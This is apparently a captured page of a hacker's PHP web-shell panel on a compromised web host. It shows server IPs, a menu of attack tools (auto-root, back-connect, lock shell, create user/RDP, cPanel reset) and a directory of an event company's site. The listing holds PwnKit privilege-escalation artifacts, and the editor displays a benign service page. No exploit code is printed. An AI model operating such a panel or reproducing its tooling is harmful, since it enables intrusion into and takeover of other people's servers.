Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 13.59.153.218
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
milovo /
theme /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_.htaccess
0
B
-rw-r--r--
about.php
9.12
KB
-rw-r--r--
blog.php
10.34
KB
-rw-r--r--
contact.php
5.91
KB
-rw-r--r--
gallery.php
3.8
KB
-rw-r--r--
indexold.html
36.83
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
service-single.php
5.35
KB
-rw-r--r--
services.php
5.31
KB
-rw-r--r--
team.php
16.6
KB
-rw-r--r--
work.php
5.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : service-single.php
<?php include("includes/header.php"); ?> <!--Page Title--> <section class="page-title" style="background-image:url(images/bg-parallax-01.jpg);"> <div class="container"> <h1>Services</h1> <ul class="bread-crumb clearfix"> <li><a href="index.php">Home</a></li> <li>Corporate Events</li> </ul> </div> </section> <!--End Page Title--> <section class="sidebar-page-container position-relative"> <div class="container"> <div class="row clearfix"> <div class="content-side col-lg-8 col-md-12 col-sm-12"> <div class="blog-single"> <img class="fm" src="images/bg-parallax-01.jpg" alt=""> <h2 class="mt-4">Corporate Events</h2> <div class="text-box"> <p>Elevate your corporate events with Milovo Events. We specialize in planning and executing a variety of corporate functions, including conferences, seminars, product launches, and team-building activities. Our meticulous attention to detail ensures that every aspect of your event is professionally managed and aligned with your business goals. </p> <h2>Our Corporate Event Services:</h2> <ul> <li><strong>Conferences & Seminars:</strong>Seamless organization and management for impactful corporate gatherings.</li> <li><strong>Product Launches:</strong> Innovative launches that create buzz and drive engagement.</li> <li><strong>Team-Building Activities:</strong> Engaging and motivational activities to strengthen team dynamics.</li> <li><strong>Corporate Parties:</strong> Elegant and professional celebrations for your corporate milestones.</li> </ul> </div> </div> </div> <div class="sidebar-side col-lg-4 col-md-12 col-sm-12"> <aside class="sidebar padding-left"> <!-- Post Widget --> <div class="sidebar-widget popular-cost"> <h4 class="sidebar-title">Get a Quote</h4> <div class="method-col contact-form"> <form method="post" action="#" id="contact-form"> <div class="row clearfix"> <div class="col-lg-12 col-md-12 col-12 form-group"> <input type="text" name="username" placeholder="Name" required=""> </div> <div class="col-lg-12 col-md-12 col-12 form-group"> <input type="text" name="phone" placeholder="Phone" required=""> </div> <div class="col-lg-12 col-md-12 col-12 form-group"> <input type="email" name="email" placeholder="Email" required=""> </div> <div class="col-lg-12 col-md-12 col-12 form-group"> <select class="form-select" aria-label="Default select example"> <option selected="">Services</option> <option value="1">Corporate Events</option> <option value="2">Exhibitions</option> <option value="3">Team Building</option> </select> </div> <div class="col-lg-12 col-md-12 col-12 form-group"> <input type="text" name="Company Namet" placeholder="Company Name"> </div> <div class="col-lg-12 col-md-12 col-12 form-group"> <textarea name="message" placeholder="Message"></textarea> </div> <div class="col-lg-12 col-md-12 col-12 form-group mb-0"> <button class="theme-btn btn-style-one" type="submit" name="submit-form">Submit Now <i class="fa-solid fa-arrow-right-long"></i></button> </div> </div> </form> </div> </div> </aside> </div> </div> </div> </section> <section class="clients-call"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-6 col-12"> <h2>Ready to make your next corporate event a success?</h2> <p class="mb-0">Contact Us to discuss your requirements. E-mail your query with us. </p> </div> <div class="col-lg-6 col-md-6 col-12 d-flex align-items-center"> <ul class="call-cmd d-flex gap-2"> <li><a class="btn-style-one" href="tel:+919871283909"><i class="fa-solid fa-phone-volume"></i> Call Us</a></li> <li><a class="btn-style-one" href="https://api.whatsapp.com/send?phone=9871283909&text=Hi%2C%20milovo"><i class="fa-brands fa-whatsapp"></i> Whatapp Us</a></li> <li><a class="btn-style-one" href="mailto:namit@milovoevents.in"><i class="icon fa-regular fa-envelope"></i> Email Us</a></li> </ul> </div> </div> </div> </section> <?php include("includes/footer.php"); ?>
Close